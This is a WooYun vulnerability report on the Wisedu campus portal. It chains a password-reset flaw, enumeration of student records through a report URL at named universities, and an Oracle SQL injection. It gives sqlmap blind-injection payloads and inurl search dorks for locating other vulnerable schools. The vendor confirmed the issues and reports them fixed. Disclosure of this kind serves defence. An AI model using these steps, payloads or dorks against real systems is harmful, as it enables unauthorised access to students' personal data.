当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087297

漏洞标题:金智教育信息门户系统可遍历用户信息并存在SQL注入漏洞

相关厂商:wisedu.com

漏洞作者: 浮萍

提交时间:2014-12-16 16:36

修复时间:2015-03-16 16:38

公开时间:2015-03-16 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-16: 细节已通知厂商并且等待厂商处理中
2014-12-19: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向第三方安全合作伙伴开放
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-16: 细节向公众公开

简要描述:

遍历+SQL注入

详细说明:

WooYun: 金智教育信息门户设计问题可导致重置任意用户密码(自相矛盾的设计)
参考该漏洞,当知道该用户的学号时,就能获取其密码
然后登陆
这里我们以“河南农业大学”为例
进入该校贴吧
然后搜索关键字“学号”

Snap1.jpg


然后找一个学号(注意:有的学号虽然存在,但是未曾登陆信息门户,所以不用该类账号
可以通过http://my.henau.edu.cn/userAttributesView.portal?userId=XX来判断该账号是否合法)
这里搜到一个12XXXX79

然后通过 WooYun: 金智教育信息门户设计问题可导致重置任意用户密码(自相矛盾的设计) 来设置密码

Snap2.jpg


设置密码后
登陆学工系统
http://xg.henau.edu.cn/epstar/login/index.jsp

Snap3.jpg


有的学号登陆后会显示如下错误

Snap4.jpg


这是由于毕业或其他原因,该账号会禁止访问某些页面
但我们不用管,我们要的是cookie
访问http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXXX (WID为学号)

Snap5.jpg


可以遍历别人的信息
学号的获取可以通过信息门户中获得
例如登陆http://my.henau.edu.cn/index.portal

Snap6.jpg


依次选择:站内消息-》写消息-》用户名—》人员
然后通过抓包
得到该链接http://my.henau.edu.cn/authorizeUsers.portal?limit=20
是个json

Snap7.jpg


另外http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXX 也是一个注入点

Snap8.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: WID (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: raq=SWMS/JBXXXQ.raq&WID=100XXXX36 AND 5846=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(70)||CHR(66)||CHR(86),5)
---
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'USR_XG'


漏洞证明:

再以http://my.zzuli.edu.cn/index.portal为例
访问http://my.zzuli.edu.cn//authorizeUsers.portal?limit=20可以获取json数据
或者http://my.zzuli.edu.cn/pnull.portal?.f=f1144&.pmn=view&action=fetchUsers&.ia=false&.pen=personnelGroupmanager&groupId=2010_PG.XXXXXXXXX.root&limit=10&oper_type=normal_user&start=0
同样是一个json数据
都包含学号和姓名等信息

Snap11.jpg


Snap13.jpg


然后访问http://xg.zzuli.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXXXXx

Snap14.jpg


同样可以遍历
然后SQL注入

sqlmap identified the following injection points with a total of 248 HTTP(s) requests:
---
Place: GET
Parameter: WID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: raq=SWMS/JBXXXQ.raq&WID=54****08 AND 9297=9297
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: raq=SWMS/JBXXXQ.raq&WID=5 AND 8235=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(114)||CHR(70)||CHR(67),5)
---


web application technology: JSP
back-end DBMS: Oracle


current schema (equivalent to database on Oracle):    'USR_XG'


由于SQL注入和遍历需要登陆
这里就不再举例了
给出几个同样存在问题的学校
测试方法如上
搜索关键字:inurl:/epstar/web/swms/mainframe/homeWithGroupSelector.jsp

Snap9.jpg


或者inurl:/epstar/login/index.jsp

Snap10.jpg


也可以将my.XXX.edu.cn换成xg.xxx.edu.cn来访问
当使用my.xxx.edu.cn登陆后
访问http://xg.xxx.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXXX

mask 区域
1.http://**.**.**/epstar/web/swms/mainframe/homeWithGroupSelector.jsp_
2.http://**.**.**/epstar/web/swms/mainframe/homeWithGroupSelector.jsp_
3.http://**.**.**/epstar/web/swms/mainframe/homeWithGroupSelector.jsptbarstyle=2_
4.http://**.**.**/epstar/login/index.jsp_
5.http://**.**.**/epstar/login/index.jsp_
6.http://**.**.**/epstar/login/index.jsp_
7.http://**.**.**/epstar/login/index.jsp_
8.http://**.**.**/_
9.http://**.**.**/_
10.http://**.**.**/_
11.http://**.**.**/xg/_
12.http://**.**.**/epstar/login/index.jsp_
13.http://**.**.**/_
14.http://**.**.**/_
15.http://**.**.**/epstar/web/swms/mainframe/homeWithGroupSelector.jsp_
16.http://**.**.**/_
17.http://**.**.**/login.portal_
18.http://**.**.**/_
19.http://**.**.**/_
*****u.ed*****
20.http://**.**.**/_
21.http://**.**.**/epstar/login/index.jsp_
22.http://**.**.**/

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-12-19 16:31

厂商回复:

任意用户密码(自相矛盾的设计)-该漏洞前段时间已发现,漏洞补丁包已出,目前已有部分学校更新了此漏洞补丁包。
SQL漏洞-该漏洞修复方案已出,目前已有部分学校更新了此漏洞补丁包。

最新状态:

2015-08-12:此漏洞已修复,非常感谢